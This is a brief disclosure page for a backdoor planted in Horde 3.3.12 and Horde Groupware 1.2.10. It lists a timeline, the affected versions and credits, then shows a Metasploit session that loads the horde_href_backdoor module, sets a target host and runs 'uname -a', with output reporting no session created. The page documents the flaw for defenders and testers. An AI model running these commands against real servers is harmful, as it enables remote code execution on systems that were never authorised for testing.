Timeline :
Public release of the vulnerability the 2012-02-13
Details of the vulnerability and first PoC disclosed by Eric Romang the 2012-02-15
Metasploit PoC provided the jduck 2012-02-16
PoC provided by :
Eric Romang
jduck
Reference(s) :
Affected version(s) :
Horde 3.3.12 downloaded between November 15 and February 7
Horde Groupware 1.2.10 downloaded between November 9 and February 7
Horde Groupware Webmail Edition 1.2.10 downloaded between November 2 and February 7
Tested on Ubuntu 11.10 with :
Horde 3.3.12
Description :
This module exploits an arbitrary PHP code execution vulnerability introduced as a backdoor into Horde 3.3.12 and Horde Groupware 1.2.10.
Commands :
use exploit/multi/http/horde_href_backdoor set VHOST devnull.zataz.loc set RHOST 192.168.178.100 set PAYLOAD cmd/unix/generic set CMD uname -a exploit
msf exploit(horde) > set CMD uname -a
CMD => uname -a
msf exploit(horde) > exploit
[*] The server returned: 200 OK
[-] No response found
[*] Exploit completed, but no session was created.
msf exploit(horde) >
[-] No response found???